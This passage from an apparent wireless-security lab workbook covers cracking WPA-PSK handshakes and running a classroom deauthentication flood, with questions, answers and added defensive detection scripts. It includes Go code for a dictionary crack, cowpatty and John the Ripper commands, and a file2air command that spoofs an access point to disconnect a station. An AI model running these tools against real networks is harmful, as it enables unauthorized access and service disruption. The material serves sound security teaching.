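	data := append(ordered(aa, spa), ordered(anonce, snonce)...)
	var out []byte
	for i := byte(0); i < 4; i++ {
		m := hmac.New(sha1.New, pmkBytes)
		m.Write([]byte("Pairwise key expansion\x00"))
		m.Write(data)
		m.Write([]byte{i})
		out = append(out, m.Sum(nil)...)
	}
	return out[:64]
}

// eapolMIC recomputes the key MIC over the EAPOL-Key frame with its MIC field zeroed:
// HMAC-MD5 for key descriptor version 1 (WPA/TKIP), HMAC-SHA1 truncated to 16 bytes for version 2 (CCMP).
func eapolMIC(kck, frame []byte) []byte {
	zeroed := append([]byte{}, frame...)
	copy(zeroed[micOffset:micOffset+16], make([]byte, 16))
	newHash := sha1.New
	if binary.BigEndian.Uint16(frame[5:])&7 == 1 {
		newHash = md5.New
	}
	m := hmac.New(newHash, kck)
	m.Write(zeroed)
	return m.Sum(nil)[:16]
}

// crackPSK repeats, per candidate, the AP's check between messages 2 and 3: derive PMK, take KCK = PTK[0:16], compare the MIC.
func crackPSK(words []string, ssid string, aa, spa, anonce, snonce, msg2 []byte) (string, bool) {
	for _, w := range words {
		if len(w) < 8 || len(w) > 63 { // 802.11i passphrase length bounds
			continue
		}
		kck := ptk(pmk(w, ssid), aa, spa, anonce, snonce)[:16]
		if bytes.Equal(eapolMIC(kck, msg2), msg2[micOffset:micOffset+16]) {
			return w, true
		}
	}
	return "", false
}

// sampleHandshake is a constructed WPA message 2 (descriptor 0xfe, key info version 1) for SSID "SANS"
// and PSK "avocation", the lab's values; the addresses and nonces are made up. It is not the capture's frame.
func sampleHandshake() (aa, spa, anonce, snonce, msg2 []byte) {
	aa, spa = []byte{0x00, 0x11, 0x22, 0x33, 0x44, 0x55}, []byte{0x00, 0xaa, 0xbb, 0xcc, 0xdd, 0xee}
	anonce, snonce = make([]byte, 32), make([]byte, 32)
	for i := range anonce {
		anonce[i], snonce[i] = byte(i*7+1), byte(255-i*3)
	}
	msg2 = make([]byte, 99)
	msg2[0], msg2[1] = 1, 3                      // 802.1X version 1, type EAPOL-Key
	binary.BigEndian.PutUint16(msg2[2:], 95)     // body length
	msg2[4] = 0xfe                               // WPA key descriptor type
	binary.BigEndian.PutUint16(msg2[5:], 0x0109) // key info: version 1, pairwise, MIC present
	binary.BigEndian.PutUint16(msg2[7:], 32)     // key length (TKIP)
	copy(msg2[17:49], snonce)                    // key nonce field carries the SNonce
	kck := ptk(pmk("avocation", "SANS"), aa, spa, anonce, snonce)[:16]
	copy(msg2[micOffset:], eapolMIC(kck, msg2)) // what the supplicant fills in
	return
}
```

The PBKDF2 step is the whole cost: 8,192 HMAC-SHA1 computations per candidate, independent of the handshake, which is why cowpatty's throughput on the lab hardware is measured in tens of passphrases per second and why the genpmk tables introduced later in this lab are keyed by SSID. The SSID is the salt, so "SANS" and "sans" produce different PMKs; passing the wrong case to cowpatty silently tests the wrong key space.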
10.1.3. Auditing the PSK

Now that we have examined the details of the four-way handshake and the information that is exchanged, we can take a look at the process of auditing the PSK with a dictionary attack. In this fashion, an auditor can capture traffic from WPA-PSK networks and mount an offline dictionary attack to identify weak and poorly selected PSKs.

First, open two XTerm windows. In the first window, run the tool "top" to monitor the performance of your system. The output of top will look similar to the example provided below.

# top
top - 14:21:20 up 3:38, 1 user, load average: 0.00, 0.07, 0.06
Tasks:  27 total,   1 running,  26 sleeping,   0 stopped,   0 zombie
Cpu(s):  0.0% user,  0.0% system,  0.0% nice, 100.0% idle
Mem:   254608k total,   108684k used,   140924k free,    19016k buffers
Swap:  987988k total,        0k used,   987988k free,    65208k cached

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
    1 root       9   0   240  240  212 S  0.0  0.1   0:04.00 init
    2 root       8   0     0    0    0 S  0.0  0.0   0:00.00 keventd
    4 root      19   0     0    0    0 S  0.0  0.0   0:00.00 ksoftirqd
    5 root       9   0     0    0    0 S  0.0  0.0   0:00.00 bdflush
    6 root       9   0     0    0    0 S  0.0  0.0   0:00.00 kupdated
   11 root       9   0     0    0    0 S  0.0  0.0   0:00.00 kreiserfsd
   64 root       9   0   592  592  512 S  0.0  0.2   0:00.00 syslogd
   67 root       9   0   448  448  392 S  0.0  0.2   0:00.01 klogd
  174 root       9   0     0    0    0 S  0.0  0.0   0:00.00 khubd
  206 root       9   0   512  512  448 S  0.0  0.2   0:00.00 dhcpcd
 1682 root       9   0   520  520  464 S  0.0  0.2   0:00.00 inetd
 1685 root       9   0  1384 1384 1292 S  0.0  0.5   0:00.00 sshd
 1693 root       8   0   564  564  496 S  0.0  0.2   0:00.00 crond
 1696 root       9   0  2116 2108 1548 S  0.0  0.8   0:00.00 sendmail

In this example, the processor for the system is reported as 100% idle. At the end of this exercise, press "Q" to exit top.

In the second XTerm window, change to the /tmp/lab10 directory as shown below.
# cd /tmp/lab10
# pwd
/tmp/lab10
# ls
lab10capture1.dump  lab10capture2.dump  lab10capture3.dump  words
#

Three packet captures from WPA-PSK networks have been supplied, along with a short list of dictionary words. Run the cowpatty tool from the current directory to see a list of available options, as shown below.

# cowpatty
cowpatty 4.0 - WPA-PSK dictionary attack.
cowpatty: Must supply a list of passphrases in a file with -f or a hash file with -d. Use "-f -" to accept words on stdin.
Usage: cowpatty [options]
        -f      Dictionary file
        -d      Hash file (genpmk)
        -r      Packet capture file
        -s      Network SSID (enclose in quotes if SSID includes spaces)
        -h      Print this help information and exit
        -v      Print verbose information (more -v for more verbosity)
        -V      Print program version and exit

The cowpatty tool requires at least three command-line options: a list of dictionary words, a libpcap-formatted packet capture containing the WPA-PSK four-way handshake, and the network SSID. Note that all three of these parameters are required, and that the SSID must be specified in the proper case as it is seen on the network: the SSID is the salt in the PMK derivation, so a different spelling produces a different PMK for every candidate and the attack will never match.

Using the "lab10capture1.dump" capture file, mount an attack against the PSK using the supplied dictionary file, as shown below. The SSID for this capture file is "SANS". While this command is running, examine the performance statistics reported by "top" in the other XTerm window.

# cowpatty -r lab10capture1.dump -f words -s SANS
cowpatty 4.0 - WPA-PSK dictionary attack.
Collected all necessary data to mount crack against passphrase.
Starting dictionary attack. Please be patient.
key no. 1000: adynamia

Question: What was the result of assessing the PSK with the cowpatty tool?
Question: What is the PSK reported by cowpatty?
Question: How many passphrases were tested with cowpatty?
Question: How long did it take to recover the passphrase?
Question: How many words per second was your system able to test?
Question: What was the relative CPU utilization of your system when running cowpatty?
Question: What could be done to reduce the amount of time needed to test all the passwords in the supplied dictionary file using this tool?

Next, mount a similar attack against the "lab10capture2.dump" capture file. You'll need to determine the SSID for the network by examining the contents of a beacon frame with Wireshark. Note also that the passphrase used for this capture file is NOT present in the dictionary file. Use the hints below to identify the PSK used for this capture file.

(Hint: You can interactively try passwords one at a time with cowpatty by specifying a hyphen as the filename, as shown below. This causes cowpatty to accept passphrases from STDIN, or keyboard input.)
(Hint: The company name is GNIP GNOP)
(Hint: The PSK is a derivation of the company name)
(Hint: The PSK is 8 characters in length)
(Hint: The PSK was selected using common techniques for selecting "strong" passwords)
(Hint: It is common for users to substitute a one ("1") for the letter "i" and a zero ("0") for the letter "o")

# cowpatty -r lab10capture2.dump -f - -s GNIPGNOPWLAN
cowpatty 4.0 - WPA-PSK dictionary attack.
Using STDIN for words.
Collected all necessary data to mount crack against passphrase.
Starting dictionary attack. Please be patient.
gnip
gnop
gnipgnop
gnipgn0p

The third capture file uses a PSK that is based on a modification of a dictionary word. Use John the Ripper in conjunction with cowpatty and the supplied word list to identify the password, as shown below. John's word-mangling rules expand each dictionary word into many variants (case changes, appended digits, character substitutions) and write them to standard output, which cowpatty reads with "-f -". Note that this attack will take a long time; be prepared for a busy system over an extended period of time while mounting this attack (it may take several days to complete, depending on the speed of your processor).

# john -rules -wordlist:words -stdout | cowpatty -r lab10capture3.dump -f - -s GNIPGNOPWLAN

In more recent versions of coWPAtty, support for precomputed hash tables of PMKs was added.
Although each hash table is specific to a single SSID, it only has to be calculated once. This is why the slow PMK derivation is worth precomputing for common default SSIDs, and why a unique SSID forces an attacker back to computing every candidate from scratch.

The final capture file is a four-way handshake capture of a WPA2-PSK network using the very common SSID "linksys". Also supplied is the hash table "linksys.hash", which includes many popular passphrases and precomputed PMK information. Instead of specifying the wordlist with the "-f" parameter, we reference a hash file that was generated with the "genpmk" tool included with coWPAtty. Recover the passphrase for the capture file "wpa2psk-linksys.dump", as shown below.

# cowpatty -r wpa2psk-linksys.dump -d linksys.hash -s linksys

Question: How much time did it take to recover the passphrase of the final capture with the precomputed PMK data?

This completes our tenth lab exercise. Congratulations.

Answers

Section 10.1.1
Question: What is the SSID for this network?
Answer: "SANS"
Question: What is the encryption protocol used for unicast traffic on this network?
Answer: TKIP.
Question: What is the encryption protocol used for multicast traffic on this network?
Answer: TKIP.
Question: What is the authentication method used for this network?
Answer: PSK, or pre-shared keys.

Section 10.1.2
Question: Is the first frame in the four-way handshake from the supplicant or the authenticator?
Answer: The first frame is from the AP.

Section 10.1.3
Question: What was the result of assessing the PSK with the cowpatty tool?
Answer: The PSK was successfully recovered.
Question: What is the PSK reported by cowpatty?
Answer: "avocation"
Question: How many passphrases were tested with cowpatty?
Answer: 4459.
Question: How long did it take to recover the passphrase?
Answer: 105 seconds on a Pentium Celeron 2 GHz system.
Question: How many words per second was your system able to test?
Answer: 42.49 words/second.
Question: What was the relative CPU utilization of your system when running cowpatty?
Answer: CPU utilization should be at nearly 100% for the duration of the attack.
Question: What could be done to reduce the amount of time needed to test all the passwords in the supplied dictionary file using this tool?
Answer: Distributing the wordlist to multiple systems or increasing the processing capacity of the system would reduce the time needed to test all the passwords.

Lab 11 — Denial of Service Attacks

Complete the exercises in this lab to reinforce the material covered in the Denial of Service Attacks on Wireless Networks module. To complete these exercises, you will need the Backtrack Security Tools Linux CD and a supported wireless card, as included in the SWAT toolkit.

Lab 11-1: Demonstrating a Denial-of-Service Attack

Purpose: This lab will provide hands-on experience in demonstrating a denial-of-service attack against a wireless station.

Description: In this lab exercise you will use the file2air utility to implement an 802.11 deauthentication flood attack against a partner station that is connected to the SANS-ROGUE01 classroom network.

It is occasionally necessary to demonstrate the effectiveness of a denial-of-service attack, either in a consulting role or to demonstrate the effectiveness of such an attack to co-workers or management. This lab will provide the means necessary to implement such an attack. Please use this information wisely; it is not wise to launch denial-of-service attacks against networks that you are not authorized to attack.

In order to complete this lab, you will need to work with a partner system. One system will follow the steps marked "[VICTIM]" and will be the target of the denial-of-service attack. The second system will follow the steps marked "[ATTACKER]" to mount the DoS attack.
You may optionally wish to switch roles after completing this lab so each person has the opportunity to attack another system. If it is more convenient to work in a group of three for this lab exercise, read the information in the ADDITIONAL EXERCISE section to have a third participant capture the DoS attack exchange with a sniffer like Wireshark.

11.1.1. [VICTIM] Connect to the classroom network

We will use the "SANS-ROGUE01" network for the connectivity that will be attacked. The SANS-ROGUE01 network is open and does not require a WEP key for authentication. Execute the following commands from a shell prompt to connect to the SANS-ROGUE01 network:

# killall dhcpcd
# iwconfig wlan0 essid SANS-ROGUE01 enc off mode managed
# dhcpcd -d wlan0

At this point, your system should be connected to the SANS-ROGUE01 network. If you had trouble getting to this point, please contact a proctor or the instructor for assistance.

11.1.2. [VICTIM] Identify address information

Next, the victim will identify client information that will be used by the attacker to target the attack. The information that is needed is the MAC address of the victim wireless card, the BSSID of the SANS-ROGUE01 access point, and the channel number. We can identify the MAC address of the wireless card by running the "ifconfig" utility, as shown below:

# ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:02:6F:33:8C:41
          inet addr:172.16.0.101  Bcast:172.16.0.255  Mask:255.255.255.0
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:43830 errors:0 dropped:20 overruns:0 frame:0
          TX packets:1397 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:3802819 (3.6 Mb)  TX bytes:818024 (798.8 Kb)
          Interrupt:10 Memory:e8362000-e836f000

The string following "HWaddr" in this output represents the MAC address of the wireless card. Write this address information in the space provided below.
Next, use the "iwconfig" utility to identify the channel and BSSID information for the access point you are currently associated to, as shown below:

# iwconfig wlan0
wlan0     IEEE 802.11b  ESSID:"SANS-ROGUE01"
          Mode:Managed  Frequency:2.462GHz  Access Point: 00:0F:66:E3:76:3B
          Bit Rate:11Mb/s   Sensitivity=1/3
          Retry min limit:8   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality:23/70  Signal level:-70 dBm  Noise level:-94 dBm
          Rx invalid nwid:0  Rx invalid crypt:11  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:3663   Missed beacon:0

The string following "Access Point:" in this output represents the BSSID of the access point. Write this address information in the space provided below.

The string following "Frequency:" indicates the frequency that is in use. We can convert this value to the channel number by using the chart provided below. Identify the channel number in use by matching the frequency in the following chart:

Frequency (GHz)  Channel    Frequency (GHz)  Channel
2.412            1          2.447            8
2.417            2          2.452            9
2.422            3          2.457            10
2.427            4          2.462            11
2.432            5          2.467            12
2.437            6          2.472            13
2.442            7          2.484            14

Use the following text box to document the MAC address, BSSID and channel number for the victim station:

Victim MAC address: ______________________
BSSID:              ______________________
Channel:            ______________________

11.1.3. [VICTIM] Ping a remote system

In order to quickly identify when the victim station has lost network connectivity, initiate a continuous ping to a remote system, as shown below:

# ping -i 5 172.16.0.1

This command will ping the remote host at 172.16.0.1 every five seconds until it is interrupted by pressing CTRL/C. Leave the ping command running until the end of this exercise.

11.1.4. [ATTACKER] Examine deauthenticate file contents

In order to mount a deauthenticate attack, we need to transmit multiple deauthenticate frames onto the network. We'll use the file2air tool for this task, so we need a file that represents the packet we will transmit into the network repeatedly. Change to the /tmp/lab11 directory and examine the contents of the file "deauth.bin".
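The frequency-to-channel lookup above follows a simple rule for the 2.4 GHz band: channels 1 to 13 sit 5 MHz apart starting at 2412 MHz, and channel 14 is the odd one out at 2484 MHz. As an added example that is not part of the workbook, the following Python parses the "iwconfig" output shown above (embedded here as a constructed sample reproducing that output) and derives the ESSID, BSSID and channel automatically; it also generalizes the rule to the 5 GHz band (channel = (MHz - 5000) / 5), which the chart does not cover. The function names are this example's own.

```python
import re

# Constructed sample reproducing the iwconfig output shown in this section.
SAMPLE_IWCONFIG = """\
wlan0     IEEE 802.11b  ESSID:"SANS-ROGUE01"
          Mode:Managed  Frequency:2.462GHz  Access Point: 00:0F:66:E3:76:3B
          Bit Rate:11Mb/s   Sensitivity=1/3
          Retry min limit:8   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality:23/70  Signal level:-70 dBm  Noise level:-94 dBm
"""


def freq_to_channel(freq_ghz: float) -> int:
    """Convert an 802.11 centre frequency in GHz to its channel number.
    2.4 GHz: channels 1-13 are 2412 + 5*(n-1) MHz, channel 14 is 2484 MHz.
    5 GHz (generalization beyond the lab chart): channel = (MHz - 5000) / 5."""
    mhz = round(freq_ghz * 1000)
    if mhz == 2484:
        return 14
    if 2412 <= mhz <= 2472 and (mhz - 2407) % 5 == 0:
        return (mhz - 2407) // 5
    if 5000 < mhz < 5900 and mhz % 5 == 0:
        return (mhz - 5000) // 5
    raise ValueError(f"{freq_ghz} GHz is not a recognised 802.11 centre frequency")


def parse_iwconfig(text: str) -> dict:
    """Pull ESSID, BSSID and frequency out of iwconfig output for one interface
    and add the derived channel number."""
    essid = re.search(r'ESSID:"([^"]*)"', text)
    bssid = re.search(r"Access Point:\s*([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})", text)
    freq = re.search(r"Frequency:\s*([\d.]+)\s*GHz", text)
    if not (essid and bssid and freq):
        raise ValueError("interface is not associated in managed mode")
    freq_ghz = float(freq.group(1))
    return {
        "essid": essid.group(1),
        "bssid": bssid.group(1).lower(),
        "frequency_ghz": freq_ghz,
        "channel": freq_to_channel(freq_ghz),
    }


if __name__ == "__main__":
    info = parse_iwconfig(SAMPLE_IWCONFIG)
    print(f"ESSID={info['essid']} BSSID={info['bssid']} channel={info['channel']}")
```

On a live system the same function can be fed the real output with `parse_iwconfig(subprocess.check_output(["iwconfig", "wlan0"], text=True))`.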
Since this is a binary file, we cannot view it with a simple ASCII editor. We can dump the hexadecimal contents of the file with the xxd utility, however, as shown below.

# cd /tmp/lab11
# xxd deauth.bin
0000000: c000 0000 ...   (28-byte hex dump; remaining bytes not legible in the scan)
# ls -l deauth.bin
1 root root 28 Apr 21 13:12 deauth.bin
#

The deauth.bin file is small, only 28 bytes. The 28 bytes of this file represent a standard 802.11 management frame header (24 bytes) with a 4-byte payload. The leading 0xc0 byte indicates that this packet is a management frame, subtype deauthenticate. The default MAC addresses identified in this packet will be overridden with command-line arguments to the file2air tool.

11.1.5. [ATTACKER] Introduction to file2air

Next, run the file2air command with no command-line parameters to display a list of available options, as shown below:

# file2air
file2air v1.0RC1 - inject 802.11 packets from binary files
file2air: Must specify -i and -f
Usage: file2air [options]
  -i  --interface   Specify an interface name
  -r  --driver      Driver type for injection
  -f  --filename    Specify a binary file contents for injection
  -c  --channel     Channel number
  -n  --count       Number of packets to send
  -w  --delay       Delay between packets (uX for usec or X for seconds)
  -t  --fast        Alias for -w u10000 (10 packets per second)
  -d  --dest        Override the destination address
  -s  --source      Override the source address
  -b  --bssid       Override the BSSID address
  -q  --seqnum      Override the sequence number (leading 0x for hex value)
  -p  --pieces      Fragment the payload into X pieces.
  -h  --help        Output this help information and exit
  -v  --verbose     Print verbose info (more -v's for more verbosity)
#

The critical command-line options we are going to use for the DoS attack are detailed as follows:

Option  Argument (if any)  Description
-i      wlan0              Interface name to use for transmitting packets
-r      wlan-ng            Driver name used for the wlan0 interface
-f      deauth.bin         Binary file describing the packet to inject
-c      <channel>          The channel number of the victim; refer to the chart above for the correct channel number
-n      100000             Number of packets to transmit before stopping
-t                         Inject 10 packets per second; no argument necessary
-d      <victim MAC>       Destination address to send the packet to; refer to the chart above for the victim MAC address
-s      <AP BSSID>         Source address to spoof; must be the MAC address of the AP. Use the chart above and specify the AP BSSID address
-b      <AP BSSID>         BSSID address to spoof; use the chart above and specify the AP BSSID address

Substitute the arguments in "<>" with the information collected from the victim station. Implementing the deauthenticate flood attack is very straightforward. Simply run the file2air command with the appropriate arguments, as shown below:

*** NOTE: Double-check the channel number and MAC addresses before initiating the DoS attack. DO NOT mount a DoS attack against any stations other than your lab partner. ***

# file2air -i wlan0 -r wlan-ng -f deauth.bin -c <channel> -n 100000 -t -d <victim MAC> -s <AP BSSID> -b <AP BSSID>
file2air v1.0RC1 - inject 802.11 packets from binary files
Transmitting packets ...

This command will continue to execute for several minutes. Allow this command to continue running while we return to examine the victim station.

11.1.6. [VICTIM] Examine victim connectivity results

Return to the victim station and examine the output from the ping command. The ping responses will stop incrementing while the attack is underway.
After a minute or two, the ping command will present a "Destination Host Unreachable" error. Note that it is possible for the victim station to occasionally transmit a ping packet and get a response while being attacked. This could be because the packets being transmitted by the attacker are colliding with other traffic on the network and need to be retransmitted, or because the attacker is limiting the attack to 10 deauthenticate frames per second.

Examine the last several lines of output from the kernel logger by running the dmesg command, as shown below:

# dmesg | tail -24
wifi0: TXEXC - status=0x0004 ([Discon]) tx_control=000c
  retry_count=0 tx_rate=0 fc=0x0108 (Data?:0 ToDS)
  A1=00:0f:66:e3:76:3b A2=00:02:6f:33:be:41 A3=ff:ff:ff:ff:ff:ff
wifi0: LinkStatus=1 (Connected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=2 (Disconnected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: TXEXC - status=0x0004 ([Discon]) tx_control=000c
  retry_count=0 tx_rate=0 fc=0x0108 (Data?:0 ToDS)
  A1=00:0f:66:e3:76:3b A2=00:02:6f:33:be:41 A3=ff:ff:ff:ff:ff:ff
wifi0: LinkStatus=1 (Connected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=2 (Disconnected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: TXEXC - status=0x0004 ([Discon]) tx_control=000c
  retry_count=0 tx_rate=0 fc=0x0108 (Data?:0 ToDS)
  A1=00:0f:66:e3:76:3b A2=00:02:6f:33:be:41 A3=ff:ff:ff:ff:ff:ff
wifi0: LinkStatus=1 (Connected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=2 (Disconnected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=1 (Connected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=2 (Disconnected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b

From this output, we can see that the Linux driver is reporting repeated connect and disconnect events as it receives deauthenticate frames from the attacker.
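The connect/disconnect pattern in the driver log is a usable host-side indicator of a deauthentication flood: a healthy association logs one "Connected" event and then stays quiet, while a station under attack logs a connect/disconnect pair every time it reassociates and is kicked off again. The following is an added example (not code from the workbook) that parses linux-wlan-ng style "LinkStatus" and "TXEXC" messages from a dmesg tail, counts Connected-to-Disconnected transitions per interface, and raises a flag when the count crosses a threshold. The log text is a constructed sample modelled on the output above; the function names and the threshold are this example's own.

```python
import re
from typing import Dict, List, Tuple

# linux-wlan-ng driver messages, as seen in the dmesg output of this lab
LINK_RE = re.compile(r"^(?P<iface>\w+): LinkStatus=\d+ \((?P<state>Connected|Disconnected)\)")
TXEXC_RE = re.compile(r"^(?P<iface>\w+): TXEXC - status=0x[0-9a-fA-F]+ \(\[(?P<reason>\w+)\]\)")

# Constructed sample: four reconnect cycles plus two transmit exceptions.
SAMPLE_DMESG = """\
wifi0: TXEXC - status=0x0004 ([Discon]) tx_control=000c
wifi0: LinkStatus=1 (Connected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=2 (Disconnected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: TXEXC - status=0x0004 ([Discon]) tx_control=000c
wifi0: LinkStatus=1 (Connected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=2 (Disconnected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=1 (Connected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=2 (Disconnected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=1 (Connected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
wifi0: LinkStatus=2 (Disconnected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
"""

# Constructed sample of a healthy association for comparison.
SAMPLE_DMESG_NORMAL = """\
wifi0: LinkStatus=1 (Connected)
wifi0: LinkStatus: BSSID=00:0f:66:e3:76:3b
"""


def parse_link_events(text: str) -> List[Tuple[str, str]]:
    """Return (interface, state) for every LinkStatus line, in log order."""
    events = []
    for line in text.splitlines():
        m = LINK_RE.match(line)
        if m:
            events.append((m.group("iface"), m.group("state")))
    return events


def count_link_flaps(text: str) -> Dict[str, int]:
    """Count Connected -> Disconnected transitions per interface. Each one is a
    completed association that was torn down again."""
    flaps: Dict[str, int] = {}
    last: Dict[str, str] = {}
    for iface, state in parse_link_events(text):
        if last.get(iface) == "Connected" and state == "Disconnected":
            flaps[iface] = flaps.get(iface, 0) + 1
        last[iface] = state
    return flaps


def count_tx_disconnects(text: str) -> Dict[str, int]:
    """Count TXEXC [Discon] errors (frames the card could not send because the
    link had just been dropped) per interface."""
    counts: Dict[str, int] = {}
    for line in text.splitlines():
        m = TXEXC_RE.match(line)
        if m and m.group("reason") == "Discon":
            counts[m.group("iface")] = counts.get(m.group("iface"), 0) + 1
    return counts


def flapping_interfaces(text: str, min_flaps: int = 3) -> List[str]:
    """Interfaces whose flap count in this log window meets the threshold."""
    return sorted(i for i, n in count_link_flaps(text).items() if n >= min_flaps)


if __name__ == "__main__":
    print("flaps:", count_link_flaps(SAMPLE_DMESG))
    print("tx disconnects:", count_tx_disconnects(SAMPLE_DMESG))
    print("flapping:", flapping_interfaces(SAMPLE_DMESG))
```

Fed with `subprocess.check_output(["dmesg"], text=True)` on the victim, the same functions give a quick way to confirm what the stalled ping suggests; the threshold should be tuned to the window size that dmesg returns, since a single roaming event also produces one flap.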
11.1.7. [ATTACKER] Stop the DoS attack

Return to the attacker's session and stop the DoS attack by pressing "CTRL/C". This will cause file2air to stop gracefully, returning to the shell prompt.

11.1.8. [VICTIM] Monitor connectivity

After the attacker stops the DoS attack, the victim station should return to normal connectivity.

Question: The victim station returns to normal operating mode when the attack is terminated. What kind of a DoS attack does this represent?

11.1.9. [VICTIM] Cleanup

Stop the ping command by pressing "CTRL/C".

ADDITIONAL EXERCISE

If there is a third station available, consider using a tool like Wireshark to capture the DoS attack while it is underway. Examine the trace after completing the deauthenticate flood by applying a filter on the victim address:

wlan.da eq 00:01:02:03:04:05 or wlan.sa eq 00:01:02:03:04:05

where 00:01:02:03:04:05 is the MAC address of the victim station.

What does the client system attempt to do when it receives a deauthenticate frame?

Is there a way we can determine if the deauthenticate frame was transmitted by an access point or by an attacker?

This completes our 11th lab exercise. Congratulations.

Answers

Section 11.1.9

Question: The victim station returns to normal operating mode when the attack is terminated. What kind of a DoS attack does this represent?
Answer: A deauthenticate flood is an example of a non-persistent DoS attack.

Section ADDITIONAL EXERCISE

Question: What does the client system attempt to do when it receives a deauthenticate frame?
Answer: The victim station will attempt to reauthenticate to the network by issuing a probe request, then authenticate and associate requests. Depending on when the deauthenticate frame is received in the process of reconnecting to the network, the station will have to restart the probe request and authenticate and associate process in order to regain connectivity to the network.
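The Additional Exercise asks whether a deauthenticate frame can be attributed to the real access point or to a spoofing station. The following is an added example (not code from the workbook or from file2air) of the approach a WLAN IDS takes: decode the 24-byte 802.11 management header, track the 12-bit sequence number per transmitter address, and flag a frame whose sequence number is far from that transmitter's running counter, since a spoofing radio's firmware keeps its own counter. The "capture" is a handful of constructed frames built with the lab's AP and station addresses: beacons from the AP with an increasing counter, one deauthentication frame carrying the AP's address but an unrelated counter value, and one that happens to sit on the counter to show the method's blind spot. The frame builder, the gap threshold and the function names are this example's own assumptions.

```python
import struct
from dataclasses import dataclass
from typing import List, Tuple

SEQ_MODULUS = 4096      # the 802.11 sequence number is 12 bits wide
MGMT = 0                # frame type 0 = management
BEACON, DEAUTH = 8, 12  # management subtypes used in the sample below


@dataclass
class Frame:
    ftype: int
    subtype: int
    retry: bool
    addr1: str   # receiver address
    addr2: str   # transmitter address, the key for sequence-number tracking
    addr3: str   # BSSID in management frames
    seq: int
    frag: int


def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_header(raw: bytes) -> Frame:
    """Decode the 24-byte 802.11 MAC header (the layout deauth.bin starts with).
    Frame Control is little-endian: version bits 0-1, type bits 2-3, subtype
    bits 4-7, retry bit 11. Sequence Control: fragment low 4 bits, sequence high 12."""
    fc, _duration, a1, a2, a3, seqctl = struct.unpack_from("<HH6s6s6sH", raw, 0)
    return Frame(ftype=(fc >> 2) & 0x3, subtype=(fc >> 4) & 0xF, retry=bool(fc & 0x0800),
                 addr1=bytes_to_mac(a1), addr2=bytes_to_mac(a2), addr3=bytes_to_mac(a3),
                 seq=seqctl >> 4, frag=seqctl & 0xF)


def make_mgmt_frame(subtype: int, dst: str, src: str, bssid: str, seq: int,
                    body: bytes = b"") -> bytes:
    """Build a management frame for the constructed sample capture (sample data only)."""
    fc = (MGMT << 2) | (subtype << 4)
    return struct.pack("<HH6s6s6sH", fc, 0, mac_to_bytes(dst), mac_to_bytes(src),
                       mac_to_bytes(bssid), seq << 4) + body


def detect_spoofed_frames(frames: List[bytes], max_gap: int = 64) -> List[Tuple[int, Frame, int]]:
    """Sequence-number analysis as a WLAN IDS performs it. A real transmitter
    advances its counter by one per frame (retries repeat it), so a frame that
    carries a known transmitter address with a counter value far from that
    transmitter's baseline came from another radio. Returns (index, frame, gap)."""
    last_seq = {}
    alerts = []
    for i, raw in enumerate(frames):
        f = parse_mgmt_header(raw)
        prev = last_seq.get(f.addr2)
        if prev is not None:
            gap = (f.seq - prev) % SEQ_MODULUS          # wrap-around safe forward distance
            if (gap == 0 and not f.retry) or gap > max_gap:
                alerts.append((i, f, gap))
                continue                                # an anomalous frame must not move the baseline
        last_seq[f.addr2] = f.seq
    return alerts


# Constructed sample capture using the lab's addresses.
AP = "00:0f:66:e3:76:3b"
STA = "00:02:6f:33:be:41"
BROADCAST = "ff:ff:ff:ff:ff:ff"
REASON_CLASS3 = struct.pack("<H", 7)   # deauth body: reason 7, class 3 frame from non-associated STA

SAMPLE_FRAMES = [
    make_mgmt_frame(BEACON, BROADCAST, AP, AP, 1000),
    make_mgmt_frame(BEACON, BROADCAST, AP, AP, 1001),
    make_mgmt_frame(BEACON, BROADCAST, AP, AP, 1002),
    make_mgmt_frame(DEAUTH, STA, AP, AP, 17, REASON_CLASS3),    # AP address, unrelated counter: flagged
    make_mgmt_frame(BEACON, BROADCAST, AP, AP, 1003),
    make_mgmt_frame(DEAUTH, STA, AP, AP, 1004, REASON_CLASS3),  # on the counter: not distinguishable this way
]

if __name__ == "__main__":
    for idx, frm, gap in detect_spoofed_frames(SAMPLE_FRAMES):
        kind = "deauthentication" if (frm.ftype, frm.subtype) == (MGMT, DEAUTH) else f"subtype {frm.subtype}"
        print(f"frame {idx}: {kind} from {frm.addr2} seq={frm.seq} gap={gap} -> likely spoofed")
```

The last sample frame is the caveat: sequence-number analysis only works while the spoofing radio's counter differs from the AP's, so an IDS combines it with other signals (signal strength, timing, and whether the station actually left). The threshold of 64 is a judgment call; a busy AP with retries and multiple queues needs a wider window than an idle one.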
